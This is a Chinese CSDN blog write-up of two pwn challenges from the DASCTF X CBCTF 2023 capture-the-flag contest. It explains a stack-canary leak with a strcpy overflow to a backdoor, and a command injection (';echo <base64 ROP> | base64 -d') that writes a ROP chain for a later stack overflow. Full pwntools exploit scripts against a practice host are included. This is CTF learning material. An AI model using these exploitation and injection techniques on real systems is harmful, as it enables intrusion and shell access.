DASCTF X CBCTF 2023|无畏者先行 部分PWN

最新推荐文章于 2024-06-09 21:16:31 发布
最新推荐文章于 2024-06-09 21:16:31 发布
阅读量327 收藏
点赞数 2
文章标签: 网络安全 安全 linux 系统安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51890658/article/details/134048110
版权

1.GuestBook

2.EASYBOX

1.GuestBook

开了canary,但可以泄漏

canary的低1字节为0x00,把他修改为非0x00可泄漏出来(其实在泄漏的时候不用还原canary的最后一字节)

有后门,可以通过strcpy函数来覆盖返回地址getshell,在这里输入2给num,循环两次,如果只循环一次是不能溢出的(因为遇到\x00会结束或覆盖到返回地址canary不会)

在第一次修改返回地址为后门,在第二次修改canary的低1字节为回车,空格,\t可转为\x00恢复canary(scanf遇到空格,回车,\t会提前结束,把它转为\x00)即可getshell

EXP:

#coding=utf-8

from pwn import *
sh=remote("node4.buuoj.cn",29215)
#sh=process("./game")
elf=ELF("./GuestBook")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda :sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]

shell=0x4012C3

un("name: ")

sd("a"*0x19)

un("a"*0x18)
canary=u64(sh.recv(8))
print hex(canary)
ret=0x401485
un("leave(MAX 4): ")
sl("2")

sl("a"*0x98+p64(canary)+"a"*8+p64(shell))
sl("a"*0x78)

inter()

2.EASYBOX

下载一个压缩包,里面存在docker文件夹,里面存放搭建的工具

在bin目录下中找到题目,64位,开了canary

本地无法运行,需要开启靶机来运行,拖入ida分析,存在system函数

在init初始化时把canary存放在了/secret/canary.txt中

有4个功能,PING,CAT,HELP,LS,后两者没有用

主要分析pingCommand和catCommand两个函数

pingCommand()函数中先向s输入0xff个字节,然后通过sprintf把数据存放到command中,command可存放0x208个数据,有check_ip,对输入的s存在限制,一些字符串和匹配符等不能使用

如果输入的s在范围内,会把ping -c 4 %s > /tmp/result.txt 存放在command中,接着执行system(command),这时如果在s中输入;echo xx 会把xx存放在/tmp/result.txt中

接着分析catCommand,check_filename也做了限制,不能直接获取flag

但在/secret/canary.txt存在canary,且把数据读取到ptr数组中,如果读的东西比较多就可以造成栈溢出,我们第一次先把canary泄露出来,接着返回pingCommand()分析怎么利用栈溢出来getshell

在字符串的最后可以把一些数据存入到result.txt文件中

sprintf遇到\x00结束,我们可以把构造好的rop进行base64加密,就没有\x00了

使用;echo (base64加密的rop) | base64 -d(解密后的原rop)   这时就把rop写入到result.txt

再接着到catCommand中,把result.txt读入到ptr,实现栈溢出getshell

EXP:

#coding=utf-8

from pwn import *
import base64
sh=remote("node4.buuoj.cn",26148)
elf=ELF("./GuestBook")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda:sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]

pop_rdi=0x401CE3
ret=0x401ce4
bin_sh=0x402090
system=0x401230


un("name: ")
sl("caibi")
un("$ ")
sl("CAT")
un("view: ")
sl("../secret/canary.txt")

canary=int(sh.recv(16),16)

un("$ ")
sl("PING")
un("s: ")
shell="a"*0x48+p64(canary)*2+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)
shell=base64.b64encode(shell)
print shell
sl(";echo "+shell+" | base64 -d")

un("$ ")
sl("CAT")
un("view: ")
sl("result.txt\x00")

inter()
 

Binary..
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
browser_pwn:浏览器pwn,现在主要工作
03-22
browser_pwn 浏览器pwn,现在主要工作。 v8_pwn v8开发 jsc_pwn 对jsc的利用
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
DASCTF X CBCTF 2023无畏先行
qq_61670993的博客
11-06 486
栈溢出
DASCTF X CBCTF 2022九月挑战赛 WriteUp
Whitebird的博客
10-24 510
DASCTF X CBCTF 2022九月挑战赛 WriteUp
DASCTF X CBCTF 2022九月挑战赛
qq_62046696的博客
10-24 1192
总结:其实当时做的时候,也想到这些了比如第一道题,但是当时没有时间戳的概念,不知道在前端找check.php发包的,然后导致,没思路。说明其中有字符确认掉了,然后发现是{{我们可以用 {{% print % }}代替,now as a web service一个web服务,那么大概几率就是ssti了。抓了个包,100000000分肯定是改一些东西,发现了check.php。一般这种题目,要么是sql注入要么就是ssti模板注入。第二个ssti单纯是因为懒!这道题打开以后其实就是一个逆序的文本框,
【Web】DASCTF X GFCTF 2024四月开启第一局 题解(全)
uuzeray的博客
04-20 2019
康好康的图片功能可以打SSRF,不能直接读本地文件,比如/etc/paswd /proc/1/environ。后来题目给了hint让打session反序列化(不是我寻思你附件也妹给session_start啊)大体思路就是先反序列化给record.php写入
DASCTF X CBCTF 2022九月挑战赛WEB复盘
m0_61206225的博客
09-21 470
dino3d Text Reverser cbshop JavaMaster
DASCTF Apr.2023 X SU Writeup By AheadSec
末初的CSDN博客
04-23 4967
DASCTF Apr.2023 X SU Writeup By AheadSec
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
FUCKING12的博客
10-06 1865
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8280
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
安全生产月”专题报道:AI智能监控技术如何助力安全生产
TSINGSEE青犀视频官方技术博客
06-04 952
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
最新发布
weixin_49715102的博客
06-09 515
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
边缘数据采集网关为企业提供高效、安全、可靠的数据采集解决方案-天拓四方
2401_84969963的博客
06-05 723
同时,通过对网关采集上来的数据进行分析,企业还能够发现生产过程中的瓶颈和问题,进一步优化生产流程和提高产品质量。传统的数据采集系统往往采用集中式的架构,所有数据都需要传输到中央服务器进行处理,这不仅增加了数据传输的延迟,还可能导致数据泄露的风险。然而,在转型过程中,许多企业面临着数据采集的难题。设备兼容性:边缘数据采集网关采用标准的通信协议和接口,能够与多种设备进行连接和通信,实现了设备之间的无缝对接。实时性:由于数据采集和处理工作都在设备边缘进行,大大减少了数据传输的延迟,实现了数据的实时采集和反馈。
明天15点!如何打好重保预防针:迎战HVV经验分享
CACTER_S的博客
06-05 367
明天15点!与CACTER安全专家一起交流分享HVV经验
2023 羊城杯 pwn
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城杯pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值